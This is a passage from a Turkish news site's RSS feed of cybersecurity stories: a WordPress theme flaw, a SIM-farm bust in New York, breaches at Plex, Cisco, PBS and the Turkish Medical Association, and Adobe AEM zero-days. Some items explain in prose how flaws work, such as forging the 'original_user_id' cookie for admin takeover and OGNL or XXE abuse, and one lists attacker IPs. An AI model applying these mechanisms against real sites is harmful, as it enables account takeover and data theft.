<p data-start="1784" data-end="1847">.ICS dosyalarının yalnızca izole edilmiş ortamlarda açılması.</p>
</li>
<li data-start="1848" data-end="1948">
<p data-start="1850" data-end="1948">Çok faktörlü kimlik doğrulama (MFA) kullanılması ve kritik hesapların parolalarının yenilenmesi.</p>
</li>
</ul>
<p data-start="1950" data-end="2114">Zafiyetin aktif şekilde istismar edildiği belirtilirken, kullanıcıların ve kurumların vakit kaybetmeden güvenlik kontrollerini tamamlamaları gerektiği vurgulandı.</p>
<p data-start="2116" data-end="2294"><strong data-start="2116" data-end="2128"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>WordPress &amp;quot;Service Finder&amp;quot; temasında kritik güvenlik açığı: Saldırganlar yönetici hesaplarını ele geçirebiliyor</title>
<link>https://www.ajansexpres.com.tr/wordpress-service-finder-temasinda-kritik-guvenlik-acigi-saldirganlar-yoenetici-hesaplarini-ele-gecirebiliyor</link>
<guid>https://www.ajansexpres.com.tr/wordpress-service-finder-temasinda-kritik-guvenlik-acigi-saldirganlar-yoenetici-hesaplarini-ele-gecirebiliyor</guid>
<description><![CDATA[ WordPress tabanlı sitelerde kullanılan &quot;Service Finder&quot; temasının rezervasyon modülünde tespit edilen kritik bir güvenlik açığı, saldırganların kimlik doğrulaması olmadan yönetici hesaplarına erişim sağlamasına neden oluyor. CVE-2025-5947 koduyla kaydedilen açık, 9.8 CVSS puanına sahip ve tüm sürümleri 6.0’a kadar etkiliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x580_68e8c95192194.webp" length="19504" type="image/jpeg"/>
<pubDate>Fri, 10 Oct 2025 11:51:10 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Service Finder temasında tespit edilen açık hangi sürümleri etkiliyor, saldırganlar bu zafiyetten nasıl yararlanıyor, hangi IP adreslerinden saldırı girişimleri tespit edildi, kullanıcılar sistemlerini korumak için hangi adımları atmalı</media:keywords>
<content:encoded><![CDATA[<p><br data-start="494" data-end="497">WordPress teması “Service Finder” içinde yer alan rezervasyon modülünde kritik bir güvenlik zafiyeti tespit edildi. CVE-2025-5947 olarak tanımlanan açık, 9.8 CVSS puanıyla “kritik” düzeyde değerlendiriliyor. Açığın, kimliği doğrulanmamış kullanıcıların yönetici hesapları da dahil olmak üzere herhangi bir kullanıcı hesabına erişim elde etmesine olanak tanıdığı bildirildi.</p>
<p></p>
<p data-start="874" data-end="1216">Uzmanlara göre, zafiyet “service_finder_switch_back()” adlı fonksiyonun hatalı çalışmasından kaynaklanıyor. Bu fonksiyon, kullanıcı geçişlerinde “original_user_id” adlı çerezi kullanıyor ancak bu çerezde kimlik doğrulama kontrolü bulunmuyor. Saldırganlar bu çerezi manipüle ederek yönetici yetkilerine sahip hesaplara erişim sağlayabiliyor.</p>
<p data-start="1218" data-end="1446">Siber güvenlik araştırmacıları, söz konusu açığın kötü niyetli kişilere içerik değiştirme, şifre güncelleme, zararlı kod ekleme veya siteyi oltalama ve kötü amaçlı yazılım kampanyalarında kullanma imkânı tanıdığını belirtiyor.</p>
<p data-start="1448" data-end="1810"><strong data-start="1448" data-end="1473">Etki Alanı ve Riskler</strong><br data-start="1473" data-end="1476">Açık, “Service Finder” temasının 6.0 sürümüne kadar olan tüm versiyonlarını etkiliyor. Tema güncel değilse, sistem üzerinde hiçbir eklenti olmasa bile site savunmasız durumda olabiliyor. Etkilenen sistemlerde izinsiz girişler, yeni kullanıcı hesaplarının oluşturulması ve yönetici panosunda olağandışı aktiviteler gözlemlenebiliyor.</p>
<p data-start="1812" data-end="2076">Güvenlik raporlarına göre, saldırı girişimlerinde 5.189.221.98, 185.109.21.157, 192.121.16.196, 194.68.32.71 ve 178.125.204.198 IP adreslerinden gelen istekler tespit edildi. Ancak bu adreslerin kayıtlarında bulunmaması sistemin güvenli olduğu anlamına gelmiyor.</p>
<p data-start="2078" data-end="2430"><strong data-start="2078" data-end="2107">Alınması Gereken Önlemler</strong><br data-start="2107" data-end="2110">Uzmanlar, temanın 6.0 sonrası sürümüne geçilmesini, tüm kullanıcı hesaplarının ve yetkilerinin gözden geçirilmesini, güvenlik duvarı (WAF) veya Wordfence gibi eklentilerin aktif hale getirilmesini öneriyor. Ayrıca site trafiği ve çerez davranışlarının özellikle yönetici oturumlarında izlenmesi gerektiği vurgulanıyor.</p>
<p data-start="2432" data-end="2575">Sistemin yedekten geri yüklenmesi planlanıyorsa, kullanılan yedeklerin temiz ve güvenilir bir kaynaktan alındığından emin olunması gerekiyor.</p>
<p data-start="2577" data-end="2832"><strong data-start="2577" data-end="2589"></strong></p>
<p></p>
<p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD Gizli Servisi BM Genel Kurulu çevresinde 100 bin SIM kartlık gizli iletişim ağını çökertti</title>
<link>https://www.ajansexpres.com.tr/abd-gizli-servisi-bm-genel-kurulu-cevresinde-100-bin-sim-kartlik-gizli-iletisim-agini-coekertti</link>
<guid>https://www.ajansexpres.com.tr/abd-gizli-servisi-bm-genel-kurulu-cevresinde-100-bin-sim-kartlik-gizli-iletisim-agini-coekertti</guid>
<description><![CDATA[ ABD Gizli Servisi, New York’ta Birleşmiş Milletler Genel Kurulu sırasında dünya liderlerini hedef alabilecek kapasitede bir telekomünikasyon ağına yönelik operasyon düzenledi. 100 binin üzerinde SIM kart ve 300’den fazla cihaz ele geçirildi. Sistemin 911 acil hatlarını çökertme, baz istasyonlarını devre dışı bırakma ve izlenemeyen iletişim sağlama kapasitesi olduğu bildirildi. Failin kimliği henüz netleşmedi, adli inceleme sürüyor. ]]></description>
<enclosure url="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c7984308.webp" length="49398" type="image/jpeg"/>
<pubDate>Wed, 24 Sep 2025 11:17:36 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>ABD Gizli Servisi’nin çökerttiği ağ hangi kapasiteye sahipti, cihazlar BM Genel Kurulu çevresinde neden yoğunlaştı, bu gizli sistemin arkasında hangi aktörlerin olabileceği araştırılıyor, adli inceleme hangi sonuçları ortaya koyacak</media:keywords>
<content:encoded><![CDATA[<p data-start="590" data-end="899">ABD Gizli Servisi, New York’ta Birleşmiş Milletler (BM) Genel Kurulu’nun güvenliği için kritik bir operasyon gerçekleştirdi. Açıklamaya göre 100.000’den fazla SIM kart ve 300’den fazla SIM sunucusu ele geçirildi. New York genelinde 35 millik bir alanı kapsayan gizli telekomünikasyon ağı tamamen çökertildi.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c8ba1386.webp" alt=""></p>
<p data-start="901" data-end="1292"><strong data-start="901" data-end="922">Tehdit Kapasitesi</strong><br data-start="922" data-end="925">Yetkililer, ele geçirilen sistemin dakikada 30 milyon SMS gönderebilecek büyüklükte olduğunu açıkladı. Ağın baz istasyonlarını devre dışı bırakma, 911 acil yardım hattına DDoS saldırısı düzenleme ve şifreli iletişim sağlama gibi işlevlere sahip olduğu belirtildi. Bu kapasitenin kamu güvenliğini ve diplomatik faaliyetleri doğrudan tehlikeye atabileceği vurgulandı.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c8d2a116.webp" alt=""></p>
<p data-start="1294" data-end="1530"><strong data-start="1294" data-end="1335">BM Genel Kurulu Çevresinde Yoğunlaşma</strong><br data-start="1335" data-end="1338">Operasyonda tespit edilen cihazların büyük kısmı BM Genel Kurulu’nun yapıldığı bölge çevresinde bulundu. Bu durum, ağın uluslararası diplomatik etkinliği hedef aldığı ihtimalini güçlendirdi.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c8eb4c9a.webp" alt=""></p>
<p data-start="1532" data-end="1868"><strong data-start="1532" data-end="1575">Ulus-Devlet ve Suç Örgütleri Bağlantısı</strong><br data-start="1575" data-end="1578">ABD’li yetkililer, adli incelemenin sürdüğünü ve ilk bulguların ulus-devlet destekli tehdit aktörleri ile organize suç grupları arasında bağlantıya işaret ettiğini duyurdu. Uzmanlara göre bu tür bir ağ casusluk, kritik altyapılara saldırı planlama ve gizli iletişim için kullanılabiliyor.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c9026abe.webp" alt=""></p>
<p data-start="1870" data-end="2144"><strong data-start="1870" data-end="1901">Fail Belirsizliğini Koruyor</strong><br data-start="1901" data-end="1904">Operasyon sonrası bazı çevrelerde Rusya, Çin ve İsrail’in adı geçse de, ABD yetkilileri herhangi bir ülkeyi resmi olarak işaret etmedi. Gizli Servis sözcüsü, “Henüz belirli bir devlet ya da örgütü suçlayacak delil yok” ifadesini kullandı.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c916f982.webp" alt=""></p>
<p data-start="2146" data-end="2376"><strong data-start="2146" data-end="2180">ABD’nin Çok Katmanlı Önlemleri</strong><br data-start="2180" data-end="2183">Operasyona Gizli Servis’in yanı sıra FBI, İç Güvenlik Bakanlığı (DHS) ve New York polisinin de katıldığı bildirildi. BM Genel Kurulu boyunca şehirde üst düzey güvenlik protokolleri uygulandı.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202509/image_870x_68d31c92787fb.webp" alt=""></p>
<p data-start="2378" data-end="2673"><strong data-start="2378" data-end="2408">Adli İnceleme Devam Ediyor</strong><br data-start="2408" data-end="2411">Ele geçirilen cihazlar üzerinde yapılan incelemeler, sistemin hangi ülke ya da örgütlerle bağlantılı olduğunu ve planlanan olası saldırıların boyutunu ortaya koyacak. Yetkililer, “Tehdit tam olarak ortadan kalkmış değil, soruşturma sürüyor” uyarısında bulundu.</p>
<p data-start="2675" data-end="2926"><strong data-start="2675" data-end="2687"></strong></p>
<p></p>
<p><b>Kaynak: Beykozun Sesi</b></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Plex’te veri ihlali: E&#45;postalar ve şifreler sızdırıldı, kullanıcılar parola değiştirmeye çağrıldı!</title>
<link>https://www.ajansexpres.com.tr/plexte-veri-ihlali-e-postalar-ve-sifreler-sizdirildi-kullanicilar-parola-degistirmeye-cagrildi</link>
<guid>https://www.ajansexpres.com.tr/plexte-veri-ihlali-e-postalar-ve-sifreler-sizdirildi-kullanicilar-parola-degistirmeye-cagrildi</guid>
<description><![CDATA[ Dünya genelinde milyonlarca kişinin kullandığı medya akış platformu Plex, yetkisiz kişilerin kullanıcı verilerine eriştiğini açıkladı. Şirket, e-posta, kullanıcı adı ve şifrelenmiş parolaların ele geçirildiğini belirterek tüm kullanıcıları şifrelerini yenilemeye ve güvenlik önlemlerini artırmaya davet etti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202509/image_870x580_68c2c554a2f7d.webp" length="4588" type="image/jpeg"/>
<pubDate>Thu, 11 Sep 2025 15:49:24 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Plex, veri güvenliği, Plex veri ihlalinde hangi bilgiler ele geçirildi, kullanıcıların alması gereken güvenlik önlemleri neler, Plex şifrelerin korunması için hangi yöntemleri kullandı, iki faktörlü kimlik doğrulama neden öneriliyor</media:keywords>
<content:encoded><![CDATA[<p data-start="444" data-end="679">Medya akış platformu Plex, yetkisiz kişilerin kullanıcı verilerine eriştiğini duyurdu. Şirket, olayın ardından güvenlik ekibinin hızlı şekilde harekete geçtiğini ve sistemlerin kontrol altına alındığını bildirdi.</p>
<p data-start="681" data-end="991">Plex’in web sitesinde yapılan açıklamada, bir üçüncü tarafın veritabanındaki sınırlı sayıda kullanıcı verisine eriştiği ifade edildi. Ele geçirilen veriler arasında kullanıcıların e-posta adresleri, kullanıcı adları, güvenli şekilde şifrelenmiş parolaları ve kimlik doğrulama verilerinin bulunduğu aktarıldı.</p>
<p data-start="993" data-end="1255"><strong data-start="993" data-end="1016">Kullanıcılara çağrı</strong><br data-start="1016" data-end="1019">Şirket, tüm kullanıcılara parolalarını derhal değiştirmeleri yönünde uyarıda bulundu. Ayrıca güvenliğin artırılması için bağlı tüm cihazlardan çıkış yapılması ve iki faktörlü kimlik doğrulamanın etkinleştirilmesi gerektiği vurgulandı.</p>
<p data-start="1257" data-end="1535"><strong data-start="1257" data-end="1291">Veri güvenliği soru işaretleri</strong><br data-start="1291" data-end="1294">Plex, kullanıcı parolalarının güçlü şifreleme yöntemleriyle korunduğunu, ancak ihtiyati tedbir olarak tüm hesapların güncellenmesi gerektiğini açıkladı. Olayın ardından platformun güvenlik süreçlerini gözden geçirmeye başladığı bildirildi.</p>]]> </content:encoded>
</item>

<item>
<title>BTK: &amp;quot;E&#45;imza veri havuzu sızıntısı iddiaları asılsız, sorumlular hakkında suç duyurusunda bulunuldu&amp;quot;</title>
<link>https://www.ajansexpres.com.tr/btk-e-imza-veri-havuzu-sizintisi-iddialari-asilsiz-sorumlular-hakkinda-suc-duyurusunda-bulunuldu</link>
<guid>https://www.ajansexpres.com.tr/btk-e-imza-veri-havuzu-sizintisi-iddialari-asilsiz-sorumlular-hakkinda-suc-duyurusunda-bulunuldu</guid>
<description><![CDATA[ Bilgi Teknolojileri ve İletişim Kurumu (BTK), bazı medya organlarında yer alan e-imza veri sızıntısı iddialarını kesin bir dille yalanladı. Kurum, Türkiye’deki e-imzaların güvenli şekilde yalnızca sahiplerinin cihazlarında bulunduğunu vurguladı ve kamuoyunu yanıltıcı haberler yayan kişiler hakkında suç duyurusunda bulunulduğunu açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202509/image_870x580_68ba9feb9a1d9.webp" length="48908" type="image/jpeg"/>
<pubDate>Fri, 05 Sep 2025 11:31:37 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>BTK e-imza sızıntısı iddialarına nasıl yanıt verdi, e-imza verileri nerede saklanıyor, 7545 sayılı yasa hangi cezaları öngörüyor, asılsız iddialar hakkında hangi yasal süreç başlatıldı</media:keywords>
<content:encoded><![CDATA[<p>Bilgi Teknolojileri ve İletişim Kurumu (BTK), elektronik imza veri havuzunun hacklendiğine dair basında yer alan iddialar üzerine açıklama yaptı.</p>
<p data-start="648" data-end="879">Kurum, Türkiye’de kullanılan tüm e-imzaların yalnızca BTK tarafından yetkilendirilen 8 Elektronik Sertifika Hizmet Sağlayıcı (ESHS) tarafından üretildiğini ve 5070 Sayılı Elektronik İmza Kanunu kapsamında denetlendiğini bildirdi.</p>
<p data-start="881" data-end="1256"><strong data-start="881" data-end="914">"Veri havuzu bulunmamaktadır"</strong><br data-start="914" data-end="917">BTK, e-imza sisteminde kişisel verilerin kurum bünyesinde tutulmadığını, nitelikli elektronik sertifikaların yalnızca kullanıcıların USB cihazlarında bulunduğunu belirtti. Açıklamada, "Türkiye’de bulunan tüm e-imzalara ait bilgiler, BTK ya da e-Devlet kapısı dahil, toplu halde herhangi bir veri havuzunda barındırılmamaktadır." denildi.</p>
<p data-start="1258" data-end="1635"><strong data-start="1258" data-end="1300">Yanıltıcı bilgiye hapis cezası uyarısı</strong><br data-start="1300" data-end="1303">Kurum, siber güvenlik alanında yanıltıcı bilgi yaymanın panik ve endişe oluşturabileceğini hatırlatarak, bu tür eylemlerin 7545 sayılı Siber Güvenlik Kanunu kapsamında suç teşkil ettiğini duyurdu. Kanunun 16. maddesine göre gerçeğe aykırı siber saldırı veya veri sızıntısı iddiaları yayanlara 2 ila 5 yıl hapis cezası öngörülüyor.</p>
<p data-start="1637" data-end="1825"><strong data-start="1637" data-end="1663">Yasal süreç başlatıldı</strong><br data-start="1663" data-end="1666">BTK, yaklaşık 2 milyon 500 bin e-imza kullanıcısını hedef alan asılsız paylaşımlar nedeniyle sorumlu kişiler hakkında suç duyurusunda bulunulduğunu açıkladı.</p>
<p data-start="1827" data-end="2030"><a href=" "E-imza veri havuzu sızıntısı iddiaları asılsız, sorumlular hakkında suç duyurusunda bulunuldu"</a><strong data-start="1827" data-end="1839"></strong></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Türk Tabipler Birliği’ne siber saldırı: 107 bin kişinin verileri risk altında</title>
<link>https://www.ajansexpres.com.tr/turk-tabipler-birligine-siber-saldiri-107-bin-kisinin-verileri-risk-altinda</link>
<guid>https://www.ajansexpres.com.tr/turk-tabipler-birligine-siber-saldiri-107-bin-kisinin-verileri-risk-altinda</guid>
<description><![CDATA[ Türk Tabipler Birliği, 8 Ağustos 2025’te gerçekleştirilen siber saldırı sonucu çalışanlar, kullanıcılar ve tabip odalarına kayıtlı üyelerin kişisel verilerinin etkilendiğini duyurdu. Kimlik, iletişim, lokasyon ve işlem güvenliği verilerinin erişildiği ve silindiği belirtildi. Kişisel Verileri Koruma Kurulu, ihlalin 14 Ağustos 2025 tarihli kararla kamuoyuna ilan edilmesine karar verdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202509/image_870x580_68ba03c5228d6.webp" length="54714" type="image/jpeg"/>
<pubDate>Fri, 05 Sep 2025 00:25:25 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Türk Tabipler Birliği veri ihlali nasıl gerçekleşti, hangi veriler siber saldırıda ele geçirildi, kaç kişinin bilgileri risk altında, KVKK bu olayla ilgili nasıl bir karar aldı</media:keywords>
<content:encoded><![CDATA[<p><br data-start="521" data-end="524">Türk Tabipler Birliği (TTB), 8 Ağustos 2025 tarihinde sistemlerine yönelik siber saldırı gerçekleştiğini açıkladı. Kuruma yapılan bildirime göre saldırının nasıl gerçekleştirildiği henüz tespit edilemedi.</p>
<p></p>
<p data-start="732" data-end="954">Veri ihlali sonucunda TTB sisteminde yer alan kayıtlı dosyalara erişildiği ve bu dosyaların silindiği ifade edildi. İhlalden etkilenen gruplar arasında çalışanlar, kullanıcılar ve tabip odalarına kayıtlı üyeler yer aldı.</p>
<p data-start="956" data-end="1252"><strong data-start="956" data-end="983">Hangi veriler etkilendi</strong><br data-start="983" data-end="986">Yapılan açıklamada, kimlik, iletişim, lokasyon, hukuki işlem ve işlem güvenliği verilerinin saldırıdan etkilendiği belirtildi. Üye veri tabanına erişim sağlanamadığı için kesin sayı belirlenemese de yaklaşık 107 bin kişinin bu ihlalden etkilenebileceği bildirildi.</p>
<p data-start="1254" data-end="1491"><strong data-start="1254" data-end="1269">KVKK kararı</strong><br data-start="1269" data-end="1272">Kişisel Verileri Koruma Kurulu (KVKK), 14 Ağustos 2025 tarihli ve 2025/1514 sayılı kararıyla söz konusu veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Kurulun incelemelerinin sürdüğü aktarıldı.</p>
<p data-start="1493" data-end="1688"><strong data-start="1493" data-end="1505"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Cisco, vishing saldırısıyla elde edilen kullanıcı verilerini içeren veri ihlalini doğruladı</title>
<link>https://www.ajansexpres.com.tr/cisco-vishing-saldirisiyla-elde-edilen-kullanici-verilerini-iceren-veri-ihlalini-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/cisco-vishing-saldirisiyla-elde-edilen-kullanici-verilerini-iceren-veri-ihlalini-dogruladi</guid>
<description><![CDATA[ Cisco, 24 Temmuz’da tespit edilen olayda, bir çalışanının sesli kimlik avı saldırısıyla kandırılması sonucu üçüncü taraf bir bulut tabanlı CRM sistemine erişim sağlandığını ve Cisco.com kullanıcı hesaplarına ait temel profil bilgilerinin çalındığını açıkladı. Şirket, parola veya hassas müşteri verilerinin ele geçirilmediğini belirtti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cda53ef90.webp" length="31268" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:29:09 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Cisco veri ihlalinde hangi kullanıcı bilgileri ele geçirildi, saldırı hangi sosyal mühendislik yöntemiyle gerçekleştirildi, olay ShinyHunters grubunun saldırı dalgasıyla bağlantılı mı, Cisco hangi güvenlik önlemlerini uygulamaya başladı</media:keywords>
<content:encoded><![CDATA[<p>Ağ ekipmanı üreticisi <strong>Cisco</strong>, Cisco.com kullanıcı hesaplarını etkileyen bir veri ihlali yaşandığını duyurdu. 24 Temmuz’da fark edilen olayda, saldırganın sesli kimlik avı (<em>vishing</em>) yöntemiyle bir şirket temsilcisini kandırarak üçüncü taraf bulut tabanlı bir <strong>Müşteri İlişkileri Yönetimi (CRM)</strong> sistemine erişim sağladığı tespit edildi.</p>
<p>Elde edilen veriler arasında kullanıcıların adları, çalıştıkları kurum isimleri, adresleri, Cisco tarafından atanmış kullanıcı kimlikleri, e-posta adresleri, telefon numaraları ve hesap oluşturma tarihleri gibi meta veriler yer alıyor. Cisco, olayda kurumsal müşterilere ait gizli bilgiler, parolalar veya hassas verilerin ele geçirilmediğini, ürün ve hizmetlerin etkilenmediğini vurguladı.</p>
<p>Şirket, saldırganın ilgili CRM sistemine erişiminin derhal sonlandırıldığını, veri koruma otoriteleriyle iletişime geçildiğini ve yasal gereklilikler doğrultusunda etkilenen kullanıcıların bilgilendirildiğini açıkladı. Cisco, benzer saldırıları önlemek için personeline vishing girişimlerini tanıma ve önleme konusunda ek eğitimler vereceğini duyurdu.</p>
<p>Olayın, <strong>ShinyHunters</strong> grubu ile ilişkilendirilen ve son haftalarda Adidas, Qantas, Allianz Life, LVMH markaları ile Chanel gibi büyük şirketleri etkileyen Salesforce tabanlı veri hırsızlığı saldırıları dalgasının bir parçası olabileceği değerlendiriliyor. Cisco, verilerin Salesforce ortamından mı çalındığını veya kaç kullanıcının etkilendiğini ise doğrulamadı.</p>
<p>Geçmişte de benzer güvenlik sorunları yaşayan şirket, Ekim ayında DevHub portalını, IntelBroker adlı tehdit aktörünün sızdırdığı “gizli” veriler sonrası çevrimdışına almış, Kasım ayında ise bunun hatalı yapılandırılmış herkese açık bir portal nedeniyle gerçekleştiğini açıklamıştı.</p>
<p>Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]> </content:encoded>
</item>

<item>
<title>Adobe, AEM Forms’ta kimlik doğrulamasız uzaktan kod çalıştırmaya izin veren iki sıfırıncı gün açığı için acil yama yayımladı</title>
<link>https://www.ajansexpres.com.tr/adobe-aem-formsta-kimlik-dogrulamasiz-uzaktan-kod-calistirmaya-izin-veren-iki-sifirinci-gun-acigi-icin-acil-yama-yayimladi</link>
<guid>https://www.ajansexpres.com.tr/adobe-aem-formsta-kimlik-dogrulamasiz-uzaktan-kod-calistirmaya-izin-veren-iki-sifirinci-gun-acigi-icin-acil-yama-yayimladi</guid>
<description><![CDATA[ Adobe, Adobe Experience Manager (AEM) Forms on JEE ürününde tespit edilen ve PoC istismar zincirleri yayımlandıktan sonra aktif tehdit haline gelen iki kritik güvenlik açığını (CVE-2025-54253 ve CVE-2025-54254) kapattı. Açıklar, uzaktan kod çalıştırma ve dosya okuma imkânı tanıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cda060c5e.webp" length="29050" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:29:04 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CVE-2025-54253 ve CVE-2025-54254 açıkları nasıl çalışıyor, PoC yayımlandıktan sonra hangi riskler ortaya çıktı, Adobe yamaları ne zaman ve nasıl yayımladı, güncelleme yapamayan yöneticiler için hangi önlemler önerildi</media:keywords>
<content:encoded><![CDATA[<div>
<p><strong>Adobe</strong>, <strong>Adobe Experience Manager (AEM) Forms on JEE</strong> için iki kritik sıfırıncı gün güvenlik açığını kapatan acil güncellemeler yayımladı. <strong>CVE-2025-54253</strong> ve <strong>CVE-2025-54254</strong> olarak izlenen açıklar, kimlik doğrulaması gerekmeksizin uzaktan kod çalıştırma ve yerel dosya okuma saldırılarına olanak tanıyor.</p>
<p><strong>CVE-2025-54253</strong>, <code>/adminui</code> modülündeki kimlik doğrulama atlatma hatası ve yanlış yapılandırılmış geliştirici ayarından kaynaklanıyor. <em>Struts2</em>’nin geliştirme modunun açık bırakılması, saldırganların HTTP istekleriyle OGNL ifadeleri çalıştırmasına imkân veriyor. Bu açık, <strong>CVSS 8.6</strong> “kritik” olarak derecelendirildi.</p>
<p><strong>CVE-2025-54254</strong> ise SOAP tabanlı kimlik doğrulama hizmetinde yer alan XML External Entity (<em>XXE</em>) zafiyetinden kaynaklanıyor. Özel hazırlanmış XML istekleriyle saldırganlar, kimlik doğrulama olmadan sunucu üzerindeki yerel dosyaları (örneğin <code>win.ini</code>) okuyabiliyor. Bu açık <strong>CVSS 10.0</strong> ile “maksimum kritik” seviyede değerlendirildi.</p>
<p>Söz konusu güvenlik sorunlarını <strong>Shubham Shah</strong> ve <strong>Adam Kues</strong> (Searchlight Cyber) 28 Nisan 2025’te Adobe’a bildirdi. Üçüncü bir açık olan <strong>CVE-2025-49533</strong> (Java deserialization yoluyla RCE) ise aynı güncelleme paketiyle giderildi. Araştırmacılar, 90 günlük bekleme süresi dolduktan sonra 29 Temmuz’da teknik ayrıntıları kamuya açıkladı.</p>
<p>Adobe, yöneticilere en kısa sürede en son güncellemeleri ve hotfix’leri yüklemelerini tavsiye etti. Güncelleme imkânı olmayan sistemlerde ise platform erişiminin internetten kısıtlanması önerildi.</p>
<p>Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>
</div>]]> </content:encoded>
</item>

<item>
<title>PBS, çalışan ve iş ortağı bilgilerini içeren veri ihlalini doğruladı</title>
<link>https://www.ajansexpres.com.tr/pbs-calisan-ve-is-ortagi-bilgilerini-iceren-veri-ihlalini-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/pbs-calisan-ve-is-ortagi-bilgilerini-iceren-veri-ihlalini-dogruladi</guid>
<description><![CDATA[ PBS, 3.997 çalışan ve iş ortağının kurumsal iletişim bilgilerinin MyPBS.org adlı dahili sistemden çalınarak Discord sunucularında paylaşıldığını açıkladı. Veriler genç kullanıcı topluluklarında dolaşsa da, kötüye kullanım riski bulunuyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd9b97fb2.webp" length="36230" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:59 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>PBS veri ihlalinde hangi bilgiler sızdırıldı, dosya hangi platformlarda paylaşıldı, olayın amacı neden finansal kazanç değil, çalışan verileri hangi riskleri barındırıyor</media:keywords>
<content:encoded><![CDATA[<p>ABD merkezli kamu yayıncısı <strong>PBS</strong>, çalışan ve iş ortaklarına ait kurumsal iletişim bilgilerinin yer aldığı bir dosyanın çevrimiçi paylaşıldığını doğruladı. Olay, <strong>MyPBS.org</strong> adlı dahili sistemin hedef alınması sonucu gerçekleşti.</p>
<p><em>BleepingComputer</em>’ın edindiği bilgilere göre, sızan dosya karanlık ağ forumlarında değil, “PBS Kids” hayranlarının bulunduğu Discord topluluklarında paylaşıldı. Bu sunucularda genç yetişkinler, ergenler ve çocuklar favori televizyon programlarını konuşuyor. Kaynaklar, dosyanın bu gruplarda “merak, isyankâr heves veya arkadaş çevresinde dikkat çekme” amacıyla dolaştığını, ancak verilerin kötüye kullanılma ihtimalinin bulunduğunu aktardı.</p>
<p>Paylaşılan JSON formatındaki dosya, <strong>3.997</strong> PBS çalışanı ve bağlı kuruluş personeline ait isim, kurumsal e-posta adresi, görev unvanı, zaman dilimi, departman, lokasyon, iş fonksiyonları, hobiler ve amir isimlerini içeriyor.</p>
<p>PBS, olayın ardından etkilenen kullanıcılarla iletişime geçtiğini ve şu an için diğer sistemlerde bir güvenlik ihlali bulgusuna rastlanmadığını açıkladı. Şirketin açıklamasında, “MyPBS.org platformundan kullanıcı verilerinin yer aldığı dosyanın çevrimiçi olarak paylaşıldığı bilgisinin ardından kapsamlı bir soruşturma başlatıldı” denildi.</p>
<p>Verilerin şu ana kadar kötü amaçla kullanıldığına dair bir bulgu olmasa da, dosyanın bu hafta sonu bile Discord topluluklarında dolaşmaya devam ettiği belirtiliyor. Özellikle PBS ve NPR üzerindeki siyasi baskılar göz önünde bulundurulduğunda, bu verilerin taciz veya <em>doxxing</em> amacıyla kullanılabileceği endişesi dile getiriliyor.</p>
<p>Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]> </content:encoded>
</item>

<item>
<title>Pandora, Salesforce tabanlı veri hırsızlığı saldırılarında müşteri bilgilerinin çalındığını doğruladı</title>
<link>https://www.ajansexpres.com.tr/pandora-salesforce-tabanli-veri-hirsizligi-saldirilarinda-musteri-bilgilerinin-calindigini-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/pandora-salesforce-tabanli-veri-hirsizligi-saldirilarinda-musteri-bilgilerinin-calindigini-dogruladi</guid>
<description><![CDATA[ Danimarkalı mücevher markası Pandora, Salesforce veritabanına yetkisiz erişim sonucu müşterilerinin isim, doğum tarihi ve e-posta adreslerinin çalındığını açıkladı. Şirket, erişimin durdurulduğunu ve güvenlik önlemlerinin güçlendirildiğini bildirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd9660273.webp" length="39136" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:54 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
